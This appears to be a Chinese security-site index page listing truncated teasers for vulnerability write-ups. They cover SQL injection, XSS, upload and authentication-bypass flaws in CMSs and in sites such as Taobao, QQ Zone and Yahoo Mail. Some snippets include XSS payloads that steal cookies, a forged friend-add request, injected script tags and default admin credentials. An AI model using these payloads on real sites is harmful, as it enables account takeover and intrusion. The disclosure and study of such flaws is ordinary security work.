多多淘宝客V7.4绕过防注入及一个注入漏洞 - 网站关注热度:20

由于程序是开源程序 并下载其程序看了一番。其实程序员还是有一点安全意识的：防注入代码：//要过滤的非法字符$ArrFiltrate = array (#union#i,#script#i,#/script#i,#select#i,#alert#i,#java.....[详情]

ChShjCms_asp4.0舞曲网上传任意文件名漏洞及修复关注热度:19

搜索关键字Powered by ChShjCms_asp4.0 我们可以搜索到很多用此程序来做舞曲或者DJ网的站。首先我们来到/USER/user_reg.asp 页面注册一个用户，注册成功并登录以后，我们来到USER/admin_dj_add.asp 页..[详情]

115网盘可绕过验证直接加好友 - 网站安全 - 自学关注热度:88

随便找个没有验证过的好友请求，几下请求编号nid然后：POST /?ac=add_friend HTTP/1.1Host: msg.115.comCookie: ***nid=71****fid=55555gid=0remark=fid就是想加的人的uid,55555是赖霖枫，修复方案：通过.....[详情]

Mnews <= 1.1 (view.php) SQL注射及修复 - 网站安全关注热度:18

#65279;?php/*# 标题: Mnews = 1.1 SQL Injection# 下载地址: http://phpbrasil.com/script/eo4aWVV_zFd/mnews-sistema-de-noticias# 影响版本: 1.1# 测试系统 GNU/Linux,Windows 7 Ultimate示.....[详情]

HTML5中容易被攻击的5个“漏洞” - 网站安全 - 自关注热度:55

在HTML5迅速崛起的同时，我们也不得不认识到HTML5给我们带来的安全问题，而且是不容小觑的安全问题。本文主要从劫持、跨域请求、桌面通知、地理定位、表单篡改这几个方面来分析了..[详情]

提高COOKIE的安全性－－相关解决方案 - 网站安全关注热度:29

网络上常见方案是：给Cookies加个加密算法。 给Cookies加个时间戳和IP戳，实际就是让Cookies在同个IP下多少时间内失效。最终使用MD5来MAC签名防止篡改但这样仍然可以看到明文信息，有一定..[详情]

update和insert报错SQL注射利用笔记 - 网站安全 - 自关注热度:23

以MySQL为例,有时候运气好的话update类型的SQL注射可以直接将我们需要的内容更新到我们可见的字段里.这样比较方便,比如这篇文章提到的dedecms的注射爆管理员密码的漏洞,期间我还傻傻的..[详情]

网易邮箱设置信息下发短信可绕过前台限制实现关注热度:30

网易邮箱设置信息下发短信时只设置了前台发送时间验证，直接POST数据绕过前台限制实现短信炸弹，不过信息内容基本上是固定的详细说明：https://ssl.mail.163.com/config/mobileconfig/index填写..[详情]

小草淘宝客单品推广程序带文章系统V1.0万能密码关注热度:47

使用小草淘宝客程序搭建网站，淘宝客推广月收入过万就这么简单！小草淘宝客单品推广程序带文章系统后台权限绕过。详细说明：程序名称： 小草淘宝客单品推广程序带文章系统版本..[详情]

Yahoo邮箱记事本正文存在XSS漏洞 - 网站安全 - 自关注热度:29

Yahoo记事本正文存在XSS漏洞详细说明：进入yahoo邮箱记事本，建立一个note，标题随便，在正文中输入/textareaimg onerror=alert(document.cookie) src=#textarea保存后再次点击这个note，弹框修复方案：..[详情]

Log1 CMS writeInfo() PHP代码注射 - 网站安全 - 自学p关注热度:29

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for mor.....[详情]

跨域Math.random()随机数预测攻击技术 - 网站安全关注热度:62

我最近在一个Web应用中发现了一个有趣的安全问题，可以使攻击者预测出Javascript的Math.random()方法在web应用所在域的窗口中产生的随机数。所以我想知道能否从其他的域来预测某个域调用..[详情]

良精企业通用建站系统漏洞总汇 - 网站安全 - 自关注热度:13

一，SQl注入漏洞1，典型的Cookies注入漏洞文件：Shownews.asp问题代码：id=cstr(request(id))Set rsnews=Server.CreateObject(ADODB.RecordSet)sql=update news set hits=hits+1 where id=idconn.e.....[详情]

大街网个人主页页面XSS 致窃取cookie直接登陆 - 网关注热度:17

编辑档案可提交XSS 未过滤学校名称 专业和描述等字段别人查看你的个人主页时显示也未做过滤同时cookie中存的DJ_RF和DJ_RF2地址可直接登录大街网可盗取cookie直接登录http://www.dajie.com/acc..[详情]

十九楼持久型及反射型xss各两处 - 网站安全 - 自关注热度:18

发帖处过滤不严，导致xss漏洞！持久型：http://www.19lou.com/forum-3206-thread-15301334835859518-1-1.htmlhttp://www.19lou.com/forum-291-thread-18701334837491991-1-1.html反射型http://topic.19lou.com/c.....[详情]

淘宝试用频道的一枚反射XSS - 网站安全 - 自学p关注热度:13

淘宝反射XSS一枚http://try.taobao.com/json/ajax_get_mytaobao_try_item.htm?sexType=callBack=img src=1 onmouseover=alert(123)修复方案：参数过滤作者 AC123..[详情]

Zen Cart 1.38a 三处高危害漏洞的修复方法 - 网站安关注热度:17

漏洞一form id=frmUpload enctype=multipart/form-data action=http://www.2cto.com /editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=postUpload a new file.....[详情]

艰难的星外虚拟机+D盾提权 - 网站安全 - 自学ph关注热度:20

昨晚在群里遛狗 一朋友突然发了个卖信封的骗子站。当时还没吃饭 也无聊就抄上家伙 跟我朋友一起 给他检查检查。 看图。这家伙估计骗了不少人,百度一下QQ见不少人刷他是骗子。主站..[详情]

腾讯QQ空间跨站漏洞及修复 - 网站安全 - 自学ph关注热度:21

QQ空间存在一处储存型跨站详细说明：QQ空间应用处有一个文件夹应用，该应用可以重命名文件名，正常情况下客户端是过滤了特殊字符的。但是特殊字符仅仅在客户端做了过滤并没有在..[详情]

qq邮箱的几个跨站(word文档,flash跨站,文本型附件关注热度:31

QQ邮箱储存型xss，无任何过滤哦亲..邮箱打开附件处文本型附件可以直接打开，对文本字符无任何过滤。在所有ie内核的浏览器下面触发文本内的xss通过以下步骤可在现漏洞首先建个记事..[详情]

SinaEditor二次开发JSP版本上传漏洞简单分析 - 网站关注热度:33

0times;00 SinaEditor简介0times;01 漏洞描述0times;02 漏洞利用0times;03 漏洞分析0times;04 漏洞修复作者:itleaf注:本人初学者,分析有误处还请指正0times;00 SinaEditor简介SinaEditor是基于新浪博.....[详情]

卡奇娱乐数据库下载漏洞及修复 - 网站安全 - 自关注热度:37

下载地址：http://down.admin5.com/asp/24277.html由于数据库没做防下载所以导致xx。管理员可以改ndash;~话说改自动易6.6的。貌似有exp可以注入。。没测试成功呃~就这套系统- -~默认数据库下载，..[详情]

Bypass 'Incorrect usage of UNION and ORDER BY' -关注热度:45

this tut will give you instructions how to inject after order by/limit.like thatPHP Code:SELET*FROMpageWHEREid=1ORDERBYid[here]ASC[here]LIMIT10,10[here]here - injection point.we c.....[详情]

Basic blind Sql Injection using (TIME DELAY) - 网站安全 -关注热度:23

基本的盲注技巧 时间延迟Blind sql Injection. (time delay)For educational purposes only!Hellow, HF users.Since no one took the time and effort to make a decent time delay tut.....[详情]

Phpspy 2011继续身份验证绕过漏洞 - 网站安全 - 自学关注热度:53

2010的在这里：http://www.2cto.com/Article/201104/87993.htmlAuthor: Tm3yShell7官方目前下载已经修补上了 目前官方下载是2011.php， 文件名为2011ok.php的是带洞版本。今天m0r5和我说phpspy2011 我都不知.....[详情]

Thinkphp框架任意代码执行漏洞利用及修复 - 网站安关注热度:26

ThinkPHP是一个开源的PHP框架， 是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkPHP，并且遵循Apache2开源协议发布。早期的思..[详情]

西街网一个SQL注射漏洞及修复 - 网站安全 - 自学关注热度:13

漏洞厂商是 西街网。。。没有在该平台买过鞋额。。。没有继续深入，这个漏洞不咋明显。。。无意中发现的。。。电商网站应该注意购物平台的安全。。。http://www.xijie.com/search/yonex..[详情]

shopex官网存在字符过滤漏洞 及修复方案 - 网站安关注热度:17

shopex官网存在字符过滤漏洞，该漏洞可以任意更改shopex网用户密码，此前更是一度拿下官方网站的webshell，这个问题已经存在2年多了，现在放出了，SHOPEX团队应该是PHP精英吧，还出现这..[详情]

actcms网站管理系统漏洞0day - 网站安全 - 自学ph关注热度:31

作者: Liuker漏洞版本：actcms3.0以下版本默认后台路径：admin/默认数据库：App_Data/DataBase.mdb默认账户：admin默认密码: admin利用点：FCK编译器漏洞界面:www.2cto.com /admin/fckeditor/editor/filemana.....[详情]

phpmywind留言板xss & csrf漏洞及修复 - 网站安全关注热度:99

这个漏洞在法客论坛公布的，我也发一下。漏洞利用条件留言代码scriptsrc=http:// www.2cto.com /admin/Inc/mywind.js/script接下来就是等了这个是个新出的 cms 管理员肯定会去猛看留言每天访问 cas..[详情]